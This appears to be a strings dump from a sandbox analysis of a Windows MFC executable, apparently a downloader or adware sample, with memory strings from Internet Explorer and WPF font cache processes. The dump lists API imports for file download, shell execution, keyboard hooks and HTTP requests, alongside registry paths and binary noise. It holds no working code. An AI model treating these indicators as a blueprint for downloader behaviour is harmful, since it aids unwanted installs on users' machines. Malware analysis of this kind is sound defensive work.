.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCOleDispatchException@@

zcÁ

R<u.pr

kC-O}

z%CMH

]%uce

o?.DCtO

Ñj\

[.NQ#

NpB0%xm

zcMD

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

RegOpenKeyExW

RegCreateKeyExW

RegOpenKeyW

RegEnumKeyW

RegCreateKeyW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

ShellExecuteW

ShellExecuteExW

UrlUnescapeW

URLDownloadToFileW

GetKeyState

CreateDialogIndirectParamW

UnhookWindowsHookEx

SetWindowsHookExW

HttpQueryInfoW

HttpSendRequestW

HttpOpenRequestW

InternetOpenUrlW

InternetCanonicalizeUrlW

InternetCrackUrlW

(.fFb#

1')3-=#3=') '#

hs.SS

<5"95"95"90

;$.:'.:$&:)

(08(03`-035(F*(.RK-

1>" (0:1

(($40 ,( 0 ,4$,0 0 ,

.text

`.rdata

@.data

.rsrc

@.reloc

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xutility

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlsimpstr.h

AtlThrow: hr = 0x%x

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator *

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\vector

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xstring

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator *

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator *

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator  =

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator  =

Id: = index: = score: ] %c

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\memory

Total list score: d

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator *

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\ostream

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator *

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator   

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator  =

std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >::operator []

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator *

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator   

hWarning: implicit LoadString(%u) failed

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlconv.h

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xtree

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator *

invalid operator<

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Dec

ExtractIcon.cpp

std::vector<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator []

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\list

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator *

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator   

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\regex

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\algorithm

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator --

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator --

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator *

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator   

std::vector<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator []

std::_Vector_const_iterator<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator  =

_std::_Vector_const_iterator<char,class std::allocator<char> >::operator *

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlcomcli.h

std::vector<wchar_t,class std::allocator<wchar_t> >::operator []

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator  =

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator *

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator   

std::vector<class argument,class std::allocator<class argument> >::operator []

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator  =

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator *

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator   

start.gif

std::vector<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator []

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator *

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator   

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator  =

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

Gstd::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator *

%s%s%s

HX

_hd_%S

0mb_%S

SELECT * FROM Win32_OperatingSystem

CACHE_S_FORMATETC_NOTSUPPORTED

CO_E_SERVER_EXEC_FAILURE

MK_E_INTERMEDIATEINTERFACENOTSUPPORTED

OLE_E_ADVISENOTSUPPORTED

REGDB_E_KEYMISSING

UCACHE_E_FIRST...CACHE_E_LAST

CACHE_S_FIRST...CACHE_S_LAST

CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST

CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST

CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST

CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST

CLIPBRD_E_FIRST...CLIPBRD_E_LAST

CLIPBRD_S_FIRST...CLIPBRD_S_LAST

CONVERT10_E_FIRST...CONVERT10_E_LAST

CONVERT10_S_FIRST...CONVERT10_S_LAST

CO_E_FIRST...CO_E_LAST

CO_S_FIRST...CO_S_LAST

DATA_E_FIRST...DATA_E_LAST

DATA_S_FIRST...DATA_S_LAST

DRAGDROP_E_FIRST...DRAGDROP_E_LAST

DRAGDROP_S_FIRST...DRAGDROP_S_LAST

ENUM_E_FIRST...ENUM_E_LAST

ENUM_S_FIRST...ENUM_S_LAST

INPLACE_E_FIRST...INPLACE_E_LAST

INPLACE_S_FIRST...INPLACE_S_LAST

MARSHAL_E_FIRST...MARSHAL_E_LAST

MARSHAL_S_FIRST...MARSHAL_S_LAST

MK_E_FIRST...MK_E_LAST

MK_S_FIRST...MK_S_LAST

OLEOBJ_E_FIRST...OLEOBJ_E_LAST

OLEOBJ_S_FIRST...OLEOBJ_S_LAST

OLE_E_FIRST...OLE_E_LAST

OLE_S_FIRST...OLE_S_LAST

REGDB_E_FIRST...REGDB_E_LAST

REGDB_S_FIRST...REGDB_S_LAST

VIEW_E_FIRST...VIEW_E_LAST

VIEW_S_FIRST...VIEW_S_LAST

FACILITY_WINDOWS

severity: %s, facility: %s ($lX)

range: %s ($lX)

%s ($lX)

Warning: constructing COleException, scode = %s.

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

ntdll.dll

kernel32.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

%s (%s:%d)

Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Error: failed to execute DDE command '%s'.

Warning: DDE command '%s' ignored because window is disabled.

pMRU: open file (%d) '%s'.

Can't register window class named %s

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

accKeyboardShortcut

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h

commctrl_DragListMsg

Kf:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

Binding entry %d failed. Status: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

GetData failed - HRESULT = 0x%X

m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)

ERROR: Dialog named '%s' must have the child style.

ERROR: Dialog named '%s' must be invisible.

ERROR: Cannot find dialog template named '%s'.

CLSID\%s

Interface\%s

mfcm90ud.dll

QueryInterface(%s) failed

QueryInterface(%s) succeeded

Kcomctl32.dll

Kcomdlg32.dll

Kshell32.dll

Kf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

hXXp://

connecting to socket address '%s'

resolved name for %s!

resolving name for %s

Warning: destroying an open %s with handle %8.8X

Warning: Disconnecting %s handle %8.8X in context %8.8X at destruction.

LHTTP/1.0

WININET.DLL

Warning: could not get volume information '%s'.

Warning: could not parse the path '%s'. Path is too long.

Warning: could not parse the path '%s'.

CFile exception: %hs, File %s, OS error information = %ld.

AppMsg

WinMsg

CmdRouting

0xx

%s: hwnd=0xX, msg = 0xX (0xX, 0xX)

%s: hwnd=0xX, msg = %hs (0xX, 0xX)

%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d

%s: Execute '%s'.

Warning: OleInitialize returned scode = %s.

ole32.dll

mscoree.dll

nf:\dd\vctools\crt_bld\self_x86\crt\src\xstring

Nf:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

%S(%d) :

ppCategory && pfnCrtDbgReport

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

wcscpy_s(szExeName, 260, L"<program name unknown>")

__crtMessageWindowW

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\stat64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\printf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

_CrtCheckMemory()

_CrtIsValidHeapPointer(pUserData)

_CrtSetDbgFlag

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

_CrtMemCheckpoint

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\rewind.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wprintf.c

nf:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.h

("Corrupted pointer passed to _freea", 0)

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\atof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wtof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsdup.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

W_CrtSetReportHook2

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szExeName, 260, "<program name unknown>")

__crtMessageWindowA

f:\dd\vctools\crt_bld\self_x86\crt\src\fullpath.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fdopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\feoferr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputws.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgets.c

f:\dd\vctools\crt_bld\self_x86\crt\src\clearerr.c

fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0

_CrtSetReportMode

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

nRptType >= 0 && nRptType < _CRT_ERRCNT

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportA

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportW

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

f:\dd\vctools\crt_bld\self_x86\crt\src\fputwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetwc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtod.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

KERNEL32.DLL

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), rterrs[tblindx].rterrtxt)

strcat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "\n\n")

strcpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), "Runtime Error!\n\nProgram: ")

_NMSG_WRITE

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

WUSER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dtoxtm64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\getcwd.c

strcpy_s(resultstr, resultsize, autofos.man)

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

("CRT Logic error during setenv",0)

__crtsetenv

c:\%original file name%.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

iexplore.exe_1032:

%?9-*09,*19}*09

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

ADVAPI32.dll

MsgWaitForMultipleObjects

IExplorer.EXE

IIIIIB(II<.Fg

7?_____ZZSSH%

)z.UUUUUUUU

,....Qym

````2```

{.QLQIIIKGKGKGKGKGKG

;33;33;0

8888880

8887080

browseui.dll

shdocvw.dll

6.00.2900.5512 (xpsp.080413-2105)

Windows

Operating System

6.00.2900.5512

WPFFontCache_v0400.exe_3016:

.text

`.data

@.rsrc

@.reloc

t1Ht.Ht

Ht.Ht

8Y%u(

Ht.Ht$Ht

tGHt;Ht.Ht$Ht

!!"$%%&$%%&())*

%s %s line %d

SHELL32.dll

RPCRT4.dll

MSVCR100_CLR0400.dll

KERNEL32.dll

ADVAPI32.dll

RegNotifyChangeKeyValue

RegCloseKey

RegQueryInfoKeyW

RegOpenKeyExW

GetSystemWindowsDirectoryW

_crt_debugger_hook

_amsg_exit

wpffontcache_v0400.pdb

.?AVMalformedKeyException@@

.?AVNotSupportedException@@

6666666666666666

666666666666

6666666

8888888

!"#$%&'()* ,-./

0000000000000

#@$@$@$@$

@:@$@$@$@$@$@$@$@$@$@$

!"#$%&'()* ,-./0

%&'(gggg)* ,..........................................................................................MMMM..

4444444444444

#$%&'()* 

!!!!"#$%&'()* ,-./0123456789:;<=

KEYW

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="wpffontcache_v0400" type="win32"></assemblyIdentity><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

4 4}455<5

:":&:*:.:2:

0!0&0,03090?0

1 1$1(1,1014181

>0>8>`>~>

1$1@1\1|1

Software\Microsoft\Avalon.Graphics

kernel32.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts

MARLETT.TTF

E\\?\

\WPFFontCache_v0400-System.dat

{2da8dded-086f-4cb9-a77f-b974b9cb0186}

\\?\UNC\

{00000000-0000-0000-0000-000000000000}

\\?\Volume

